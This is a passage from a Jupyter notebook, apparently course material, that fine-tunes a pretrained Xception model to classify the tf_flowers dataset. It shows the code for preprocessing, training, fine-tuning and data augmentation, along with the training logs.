"# TensorFlow ≥2.0 is required for this notebook\nimport tensorflow as tf\nfrom tensorflow import keras\nassert tf.__version__ >= \"2.0\"\n\n# check if GPU is available as this notebook will be very slow without GPU\nif not tf.test.is_gpu_available():\n print(\"No GPU was detected. CNNs can be very slow without a GPU.\")\n if IS_COLAB:\n print(\"Go to Runtime > Change runtime and select a GPU hardware accelerator.\")\n",
"WARNING:tensorflow:From <ipython-input-1-8f63222163f0>:6: is_gpu_available (from tensorflow.python.framework.test_util) is deprecated and will be removed in a future version.\nInstructions for updating:\nUse `tf.config.list_physical_devices('GPU')` instead.\n"
],
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\nimport numpy as np\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.layers import Dense, Activation, Input, Dropout, Conv2D, MaxPooling2D, Flatten, BatchNormalization, GaussianNoise\nfrom tensorflow.keras.models import Model\nimport matplotlib.pyplot as plt\n\n!pip install --upgrade deeplearning2020\nfrom deeplearning2020 import helpers\n\n# jupyters magic command\n%matplotlib inline",
"Collecting deeplearning2020\n Downloading https://files.pythonhosted.org/packages/63/41/8069878771ff9fe61ad5776f2c428606b904bdf6e9a03d75fe64c8595f5b/deeplearning2020-0.4.18.tar.gz\nCollecting kerasltisubmission>=0.4.9\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/de/56/0b6adef8e6f5d89e9daa68e03d00850509f1553ce6303c0a49d7c619dd26/kerasltisubmission-0.4.9.tar.gz (392kB)\n\u001b[K |████████████████████████████████| 399kB 4.1MB/s \n\u001b[?25hRequirement already satisfied, skipping upgrade: numpy in /usr/local/lib/python3.6/dist-packages (from kerasltisubmission>=0.4.9->deeplearning2020) (1.18.2)\nRequirement already satisfied, skipping upgrade: progressbar2 in /usr/local/lib/python3.6/dist-packages (from kerasltisubmission>=0.4.9->deeplearning2020) (3.38.0)\nRequirement already satisfied, skipping upgrade: requests in /usr/local/lib/python3.6/dist-packages (from kerasltisubmission>=0.4.9->deeplearning2020) (2.21.0)\nRequirement already satisfied, skipping upgrade: six in /usr/local/lib/python3.6/dist-packages (from progressbar2->kerasltisubmission>=0.4.9->deeplearning2020) (1.12.0)\nRequirement already satisfied, skipping upgrade: python-utils>=2.3.0 in /usr/local/lib/python3.6/dist-packages (from progressbar2->kerasltisubmission>=0.4.9->deeplearning2020) (2.4.0)\nRequirement already satisfied, skipping upgrade: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests->kerasltisubmission>=0.4.9->deeplearning2020) (2019.11.28)\nRequirement already satisfied, skipping upgrade: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests->kerasltisubmission>=0.4.9->deeplearning2020) (3.0.4)\nRequirement already satisfied, skipping upgrade: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests->kerasltisubmission>=0.4.9->deeplearning2020) (2.8)\nRequirement already satisfied, skipping upgrade: urllib3<1.25,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests->kerasltisubmission>=0.4.9->deeplearning2020) (1.24.3)\nBuilding wheels for collected packages: deeplearning2020, kerasltisubmission\n Building wheel for deeplearning2020 (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for deeplearning2020: filename=deeplearning2020-0.4.18-py2.py3-none-any.whl size=8393 sha256=ff7f4a24d9cf5721e9ce2c9d5e594a3643f64a82898d3eec562278fad25a8465\n Stored in directory: /root/.cache/pip/wheels/c9/24/f5/8258a898fd2cd12315ca220f208be60cc08dc29bc6bd73a0df\n Building wheel for kerasltisubmission (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for kerasltisubmission: filename=kerasltisubmission-0.4.9-py2.py3-none-any.whl size=8867 sha256=0ae6bbc142f8b6525904924101fcddf5d091cf2adcf6d28cb14b1daf3ecc769b\n Stored in directory: /root/.cache/pip/wheels/fd/61/f7/09171376b25408ae21b58e98c9fbf2eb924f676bb77659f983\nSuccessfully built deeplearning2020 kerasltisubmission\nInstalling collected packages: kerasltisubmission, deeplearning2020\nSuccessfully installed deeplearning2020-0.4.18 kerasltisubmission-0.4.9\n"
],
[
"# resize the images to a uniform size\ndef preprocess(image, label):\n resized_image = tf.image.resize(image, [224, 224])\n # run Xceptions preprocessing function\n preprocessed_image = tf.keras.applications.xception.preprocess_input(resized_image)\n return preprocessed_image, label",
"_____no_output_____"
]
],
[
[
"## Loading and Preprocessing",
"_____no_output_____"
]
],
[
[
"# download the dataset with labels and with information about the data\ndata, info = tfds.load(\"tf_flowers\", as_supervised=True, with_info=True)\n\n# print the most important information\ndataset_size = info.splits['train'].num_examples\nprint('dataset size: ', dataset_size)\nclass_names = info.features['label'].names\nprint('class names: ', class_names)\nn_classes = info.features['label'].num_classes\nprint('number of classes: ', n_classes)\n\nbatch_size = 32\n\ntry:\n train_data = tfds.load('tf_flowers', split=\"train[:80%]\", as_supervised=True)\n test_data = tfds.load('tf_flowers', split=\"train[80%:100%]\", as_supervised=True)\n train_data = train_data.shuffle(1000).map(preprocess).batch(batch_size).prefetch(1)\n test_data = test_data.map(preprocess).batch(batch_size).prefetch(1)\nexcept(Exception):\n # split the data into train and test data with a 8:2 ratio\n train_split, test_split = tfds.Split.TRAIN.subsplit([8, 2])\n train_data = tfds.load('tf_flowers', split=train_split, as_supervised=True)\n test_data = tfds.load('tf_flowers', split=test_split, as_supervised=True)\n train_data = train_data.shuffle(1000).map(preprocess).batch(batch_size).prefetch(1)\n test_data = test_data.map(preprocess).batch(batch_size).prefetch(1) ",
"dataset size: 3670\nclass names: ['dandelion', 'daisy', 'tulips', 'sunflowers', 'roses']\nnumber of classes: 5\n"
],
[
"# show some images from the dataset\nhelpers.plot_images(train_data.unbatch().take(9).map(lambda x, y: ((x + 1) / 2, y)), class_names)",
"_____no_output_____"
]
],
[
[
"## Definition and Training",
"_____no_output_____"
]
],
[
[
"from tensorflow.keras.applications.xception import Xception\nfrom tensorflow.keras.layers import GlobalAveragePooling2D\n\n# build a transfer learning model with Xception and a new Fully-Connected-Classifier\nbase_model = Xception(\n weights='imagenet',\n include_top=False\n)\nmodel = GlobalAveragePooling2D()(base_model.output)\nmodel = Dropout(0.5)(model)\n\n# include new Fully-Connected-Classifier\noutput_layer = Dense(n_classes, activation='softmax')(model)\n\n# create Model\nmodel = Model(base_model.input, output_layer)",
"_____no_output_____"
],
[
"model.summary()",
"Model: \"model_1\"\n__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_2 (InputLayer) [(None, None, None, 0 \n__________________________________________________________________________________________________\nblock1_conv1 (Conv2D) (None, None, None, 3 864 input_2[0][0] \n__________________________________________________________________________________________________\nblock1_conv1_bn (BatchNormaliza (None, None, None, 3 128 block1_conv1[0][0] \n__________________________________________________________________________________________________\nblock1_conv1_act (Activation) (None, None, None, 3 0 block1_conv1_bn[0][0] \n__________________________________________________________________________________________________\nblock1_conv2 (Conv2D) (None, None, None, 6 18432 block1_conv1_act[0][0] \n__________________________________________________________________________________________________\nblock1_conv2_bn (BatchNormaliza (None, None, None, 6 256 block1_conv2[0][0] \n__________________________________________________________________________________________________\nblock1_conv2_act (Activation) (None, None, None, 6 0 block1_conv2_bn[0][0] \n__________________________________________________________________________________________________\nblock2_sepconv1 (SeparableConv2 (None, None, None, 1 8768 block1_conv2_act[0][0] \n__________________________________________________________________________________________________\nblock2_sepconv1_bn (BatchNormal (None, None, None, 1 512 block2_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock2_sepconv2_act (Activation (None, None, None, 1 0 block2_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock2_sepconv2 (SeparableConv2 (None, None, None, 1 17536 block2_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock2_sepconv2_bn (BatchNormal (None, None, None, 1 512 block2_sepconv2[0][0] \n__________________________________________________________________________________________________\nconv2d_4 (Conv2D) (None, None, None, 1 8192 block1_conv2_act[0][0] \n__________________________________________________________________________________________________\nblock2_pool (MaxPooling2D) (None, None, None, 1 0 block2_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_4 (BatchNor (None, None, None, 1 512 conv2d_4[0][0] \n__________________________________________________________________________________________________\nadd_12 (Add) (None, None, None, 1 0 block2_pool[0][0] \n batch_normalization_4[0][0] \n__________________________________________________________________________________________________\nblock3_sepconv1_act (Activation (None, None, None, 1 0 add_12[0][0] \n__________________________________________________________________________________________________\nblock3_sepconv1 (SeparableConv2 (None, None, None, 2 33920 block3_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock3_sepconv1_bn (BatchNormal (None, None, None, 2 1024 block3_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock3_sepconv2_act (Activation (None, None, None, 2 0 block3_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock3_sepconv2 (SeparableConv2 (None, None, None, 2 67840 block3_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock3_sepconv2_bn (BatchNormal (None, None, None, 2 1024 block3_sepconv2[0][0] \n__________________________________________________________________________________________________\nconv2d_5 (Conv2D) (None, None, None, 2 32768 add_12[0][0] \n__________________________________________________________________________________________________\nblock3_pool (MaxPooling2D) (None, None, None, 2 0 block3_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_5 (BatchNor (None, None, None, 2 1024 conv2d_5[0][0] \n__________________________________________________________________________________________________\nadd_13 (Add) (None, None, None, 2 0 block3_pool[0][0] \n batch_normalization_5[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv1_act (Activation (None, None, None, 2 0 add_13[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv1 (SeparableConv2 (None, None, None, 7 188672 block4_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv1_bn (BatchNormal (None, None, None, 7 2912 block4_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv2_act (Activation (None, None, None, 7 0 block4_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block4_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock4_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block4_sepconv2[0][0] \n__________________________________________________________________________________________________\nconv2d_6 (Conv2D) (None, None, None, 7 186368 add_13[0][0] \n__________________________________________________________________________________________________\nblock4_pool (MaxPooling2D) (None, None, None, 7 0 block4_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_6 (BatchNor (None, None, None, 7 2912 conv2d_6[0][0] \n__________________________________________________________________________________________________\nadd_14 (Add) (None, None, None, 7 0 block4_pool[0][0] \n batch_normalization_6[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv1_act (Activation (None, None, None, 7 0 add_14[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv1 (SeparableConv2 (None, None, None, 7 536536 block5_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv1_bn (BatchNormal (None, None, None, 7 2912 block5_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv2_act (Activation (None, None, None, 7 0 block5_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block5_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block5_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv3_act (Activation (None, None, None, 7 0 block5_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv3 (SeparableConv2 (None, None, None, 7 536536 block5_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock5_sepconv3_bn (BatchNormal (None, None, None, 7 2912 block5_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_15 (Add) (None, None, None, 7 0 block5_sepconv3_bn[0][0] \n add_14[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv1_act (Activation (None, None, None, 7 0 add_15[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv1 (SeparableConv2 (None, None, None, 7 536536 block6_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv1_bn (BatchNormal (None, None, None, 7 2912 block6_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv2_act (Activation (None, None, None, 7 0 block6_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block6_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block6_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv3_act (Activation (None, None, None, 7 0 block6_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv3 (SeparableConv2 (None, None, None, 7 536536 block6_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock6_sepconv3_bn (BatchNormal (None, None, None, 7 2912 block6_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_16 (Add) (None, None, None, 7 0 block6_sepconv3_bn[0][0] \n add_15[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv1_act (Activation (None, None, None, 7 0 add_16[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv1 (SeparableConv2 (None, None, None, 7 536536 block7_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv1_bn (BatchNormal (None, None, None, 7 2912 block7_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv2_act (Activation (None, None, None, 7 0 block7_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block7_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block7_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv3_act (Activation (None, None, None, 7 0 block7_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv3 (SeparableConv2 (None, None, None, 7 536536 block7_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock7_sepconv3_bn (BatchNormal (None, None, None, 7 2912 block7_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_17 (Add) (None, None, None, 7 0 block7_sepconv3_bn[0][0] \n add_16[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv1_act (Activation (None, None, None, 7 0 add_17[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv1 (SeparableConv2 (None, None, None, 7 536536 block8_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv1_bn (BatchNormal (None, None, None, 7 2912 block8_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv2_act (Activation (None, None, None, 7 0 block8_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block8_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block8_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv3_act (Activation (None, None, None, 7 0 block8_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv3 (SeparableConv2 (None, None, None, 7 536536 block8_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock8_sepconv3_bn (BatchNormal (None, None, None, 7 2912 block8_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_18 (Add) (None, None, None, 7 0 block8_sepconv3_bn[0][0] \n add_17[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv1_act (Activation (None, None, None, 7 0 add_18[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv1 (SeparableConv2 (None, None, None, 7 536536 block9_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv1_bn (BatchNormal (None, None, None, 7 2912 block9_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv2_act (Activation (None, None, None, 7 0 block9_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv2 (SeparableConv2 (None, None, None, 7 536536 block9_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv2_bn (BatchNormal (None, None, None, 7 2912 block9_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv3_act (Activation (None, None, None, 7 0 block9_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv3 (SeparableConv2 (None, None, None, 7 536536 block9_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock9_sepconv3_bn (BatchNormal (None, None, None, 7 2912 block9_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_19 (Add) (None, None, None, 7 0 block9_sepconv3_bn[0][0] \n add_18[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv1_act (Activatio (None, None, None, 7 0 add_19[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv1 (SeparableConv (None, None, None, 7 536536 block10_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv1_bn (BatchNorma (None, None, None, 7 2912 block10_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv2_act (Activatio (None, None, None, 7 0 block10_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv2 (SeparableConv (None, None, None, 7 536536 block10_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv2_bn (BatchNorma (None, None, None, 7 2912 block10_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv3_act (Activatio (None, None, None, 7 0 block10_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv3 (SeparableConv (None, None, None, 7 536536 block10_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock10_sepconv3_bn (BatchNorma (None, None, None, 7 2912 block10_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_20 (Add) (None, None, None, 7 0 block10_sepconv3_bn[0][0] \n add_19[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv1_act (Activatio (None, None, None, 7 0 add_20[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv1 (SeparableConv (None, None, None, 7 536536 block11_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv1_bn (BatchNorma (None, None, None, 7 2912 block11_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv2_act (Activatio (None, None, None, 7 0 block11_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv2 (SeparableConv (None, None, None, 7 536536 block11_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv2_bn (BatchNorma (None, None, None, 7 2912 block11_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv3_act (Activatio (None, None, None, 7 0 block11_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv3 (SeparableConv (None, None, None, 7 536536 block11_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock11_sepconv3_bn (BatchNorma (None, None, None, 7 2912 block11_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_21 (Add) (None, None, None, 7 0 block11_sepconv3_bn[0][0] \n add_20[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv1_act (Activatio (None, None, None, 7 0 add_21[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv1 (SeparableConv (None, None, None, 7 536536 block12_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv1_bn (BatchNorma (None, None, None, 7 2912 block12_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv2_act (Activatio (None, None, None, 7 0 block12_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv2 (SeparableConv (None, None, None, 7 536536 block12_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv2_bn (BatchNorma (None, None, None, 7 2912 block12_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv3_act (Activatio (None, None, None, 7 0 block12_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv3 (SeparableConv (None, None, None, 7 536536 block12_sepconv3_act[0][0] \n__________________________________________________________________________________________________\nblock12_sepconv3_bn (BatchNorma (None, None, None, 7 2912 block12_sepconv3[0][0] \n__________________________________________________________________________________________________\nadd_22 (Add) (None, None, None, 7 0 block12_sepconv3_bn[0][0] \n add_21[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv1_act (Activatio (None, None, None, 7 0 add_22[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv1 (SeparableConv (None, None, None, 7 536536 block13_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv1_bn (BatchNorma (None, None, None, 7 2912 block13_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv2_act (Activatio (None, None, None, 7 0 block13_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv2 (SeparableConv (None, None, None, 1 752024 block13_sepconv2_act[0][0] \n__________________________________________________________________________________________________\nblock13_sepconv2_bn (BatchNorma (None, None, None, 1 4096 block13_sepconv2[0][0] \n__________________________________________________________________________________________________\nconv2d_7 (Conv2D) (None, None, None, 1 745472 add_22[0][0] \n__________________________________________________________________________________________________\nblock13_pool (MaxPooling2D) (None, None, None, 1 0 block13_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_7 (BatchNor (None, None, None, 1 4096 conv2d_7[0][0] \n__________________________________________________________________________________________________\nadd_23 (Add) (None, None, None, 1 0 block13_pool[0][0] \n batch_normalization_7[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv1 (SeparableConv (None, None, None, 1 1582080 add_23[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv1_bn (BatchNorma (None, None, None, 1 6144 block14_sepconv1[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv1_act (Activatio (None, None, None, 1 0 block14_sepconv1_bn[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv2 (SeparableConv (None, None, None, 2 3159552 block14_sepconv1_act[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv2_bn (BatchNorma (None, None, None, 2 8192 block14_sepconv2[0][0] \n__________________________________________________________________________________________________\nblock14_sepconv2_act (Activatio (None, None, None, 2 0 block14_sepconv2_bn[0][0] \n__________________________________________________________________________________________________\nglobal_average_pooling2d_1 (Glo (None, 2048) 0 block14_sepconv2_act[0][0] \n__________________________________________________________________________________________________\ndropout_1 (Dropout) (None, 2048) 0 global_average_pooling2d_1[0][0] \n__________________________________________________________________________________________________\ndense_1 (Dense) (None, 5) 10245 dropout_1[0][0] \n==================================================================================================\nTotal params: 20,871,725\nTrainable params: 20,817,197\nNon-trainable params: 54,528\n__________________________________________________________________________________________________\n"
],
[
"# set the pretrained layers to not trainable because\n# there are already trained and we don't want to destroy\n# their weights\nfor layer in base_model.layers:\n layer.trainable = False",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"model.compile(\n optimizer=tf.keras.optimizers.SGD(lr=0.2, momentum=0.9, decay=0.01),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n)\nhistory = model.fit(\n train_data,\n epochs=5,\n validation_data=test_data\n)",
"Epoch 1/5\n92/92 [==============================] - 36s 388ms/step - loss: 0.9322 - accuracy: 0.6570 - val_loss: 137.3918 - val_accuracy: 0.1676\nEpoch 2/5\n92/92 [==============================] - 35s 379ms/step - loss: 0.6798 - accuracy: 0.7681 - val_loss: 6.4545 - val_accuracy: 0.4441\nEpoch 3/5\n92/92 [==============================] - 35s 378ms/step - loss: 0.4244 - accuracy: 0.8556 - val_loss: 0.5848 - val_accuracy: 0.8065\nEpoch 4/5\n92/92 [==============================] - 35s 378ms/step - loss: 0.2895 - accuracy: 0.9087 - val_loss: 0.5933 - val_accuracy: 0.8256\nEpoch 5/5\n92/92 [==============================] - 35s 378ms/step - loss: 0.1671 - accuracy: 0.9418 - val_loss: 0.3851 - val_accuracy: 0.8815\n"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"# to finetune the model, we have to set more layers to trainable\n# and reduce the learning rate drastically to prevent\n# destroying of weights\nfor layer in base_model.layers:\n layer.trainable = True",
"_____no_output_____"
],
[
"# reduce the learning rate to not damage the pretrained weights\n# model will need longer to train because all the layers are trainable\nmodel.compile(\n optimizer=tf.keras.optimizers.SGD(lr=0.01, momentum=0.9, decay=0.001),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n)\nhistory_finetune=model.fit(\n train_data,\n epochs=10,\n validation_data=test_data\n)",
"Epoch 1/10\n92/92 [==============================] - 36s 387ms/step - loss: 0.1017 - accuracy: 0.9721 - val_loss: 0.2701 - val_accuracy: 0.9074\nEpoch 2/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0685 - accuracy: 0.9775 - val_loss: 0.2804 - val_accuracy: 0.9087\nEpoch 3/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0692 - accuracy: 0.9802 - val_loss: 0.2713 - val_accuracy: 0.9237\nEpoch 4/10\n92/92 [==============================] - 35s 379ms/step - loss: 0.0410 - accuracy: 0.9871 - val_loss: 0.2789 - val_accuracy: 0.9155\nEpoch 5/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0388 - accuracy: 0.9901 - val_loss: 0.2774 - val_accuracy: 0.9183\nEpoch 6/10\n92/92 [==============================] - 35s 379ms/step - loss: 0.0281 - accuracy: 0.9928 - val_loss: 0.2995 - val_accuracy: 0.9128\nEpoch 7/10\n92/92 [==============================] - 35s 379ms/step - loss: 0.0231 - accuracy: 0.9932 - val_loss: 0.3086 - val_accuracy: 0.9196\nEpoch 8/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0258 - accuracy: 0.9918 - val_loss: 0.3124 - val_accuracy: 0.9210\nEpoch 9/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0259 - accuracy: 0.9922 - val_loss: 0.3130 - val_accuracy: 0.9183\nEpoch 10/10\n92/92 [==============================] - 35s 378ms/step - loss: 0.0157 - accuracy: 0.9956 - val_loss: 0.3218 - val_accuracy: 0.9183\n"
]
],
[
[
"## Visualization and Evaluation",
"_____no_output_____"
]
],
[
[
"# add the two histories and print the diagram\nhelpers.plot_two_histories(history, history_finetune)",
"_____no_output_____"
]
],
[
[
"# Transfer Learning with Data Augmentation\n## Model Definition",
"_____no_output_____"
]
],
[
[
"from tensorflow.keras.applications.xception import Xception\nfrom tensorflow.keras.layers import GlobalAveragePooling2D\n\n# build a transfer learning model with Xception and a new Fully-Connected-Classifier\nbase_model_data_augmentation = Xception(\n weights='imagenet',\n include_top=False\n)\nmodel = GlobalAveragePooling2D()(base_model_data_augmentation.output)\nmodel = Dropout(0.5)(model)\n\n# include new Fully-Connected-Classifier\noutput_layer = Dense(n_classes, activation='softmax')(model)\n\n# create Model\ndata_augmentation_model = Model(base_model_data_augmentation.input, output_layer)",
"_____no_output_____"
]
],
[
[
"## Adjust Data Augmentation",
"_____no_output_____"
]
],
[
[
"# resize the images to a uniform size\ndef preprocess_with_data_augmentation(image, label):\n resized_image = tf.image.resize(image, [224, 224])\n\n # data augmentation with Tensorflow\n augmented_image = tf.image.random_flip_left_right(resized_image)\n augmented_image = tf.image.random_hue(augmented_image, 0.08)\n augmented_image = tf.image.random_saturation(augmented_image, 0.6, 1.6)\n augmented_image = tf.image.random_brightness(augmented_image, 0.05)\n augmented_image = tf.image.random_contrast(augmented_image, 0.7, 1.3)\n\n # run Xceptions preprocessing function\n preprocessed_image = tf.keras.applications.xception.preprocess_input(augmented_image)\n return preprocessed_image, label",
"_____no_output_____"
],
[
"batch_size = 32\ntry:\n train_data = tfds.load('tf_flowers', split=\"train[:80%]\", as_supervised=True)\nexcept(Exception):\n # split the data into train and test data with a 8:2 ratio\n train_split, test_split = tfds.Split.TRAIN.subsplit([8, 2])\n train_data = tfds.load('tf_flowers', split=train_split, as_supervised=True) \naugmented_train_data = train_data.map(preprocess_with_data_augmentation).batch(batch_size).prefetch(1)",
"_____no_output_____"
]
],
[
[
"## Training",
"_____no_output_____"
]
],
[
[
"# set the pretrained layers to not trainable because\n# there are already trained and we don't want to destroy\n# their weights\nfor layer in base_model_data_augmentation.layers:\n layer.trainable = False\ndata_augmentation_model.compile(\n optimizer=tf.keras.optimizers.SGD(lr=0.2, momentum=0.9, decay=0.01),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n)\nhistory_data_augmentation = data_augmentation_model.fit(\n augmented_train_data,\n epochs=3,\n validation_data=test_data\n)",
"Epoch 1/3\n92/92 [==============================] - 13s 137ms/step - loss: 2.4155 - accuracy: 0.7520 - val_loss: 0.7927 - val_accuracy: 0.8828\nEpoch 2/3\n92/92 [==============================] - 12s 128ms/step - loss: 1.6251 - accuracy: 0.8270 - val_loss: 0.9737 - val_accuracy: 0.8760\nEpoch 3/3\n92/92 [==============================] - 12s 129ms/step - loss: 1.3145 - accuracy: 0.8450 - val_loss: 0.5669 - val_accuracy: 0.8992\n"
]
],
[
[
"## Finetuning",
"_____no_output_____"
]
],
[
[
"# to finetune the model, we have to set more layers to trainable\n# and reduce the learning rate drastically to prevent\n# destroying of weights\nfor layer in base_model_data_augmentation.layers:\n layer.trainable = True\n # reduce the learning rate to not damage the pretrained weights\n# model will need longer to train because all the layers are trainable\ndata_augmentation_model.compile(\n optimizer=tf.keras.optimizers.SGD(lr=0.01, momentum=0.9, decay=0.001),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']\n)\nhistory_finetune_data_augmentation = data_augmentation_model.fit(\n augmented_train_data,\n epochs=30,\n validation_data=test_data\n)",
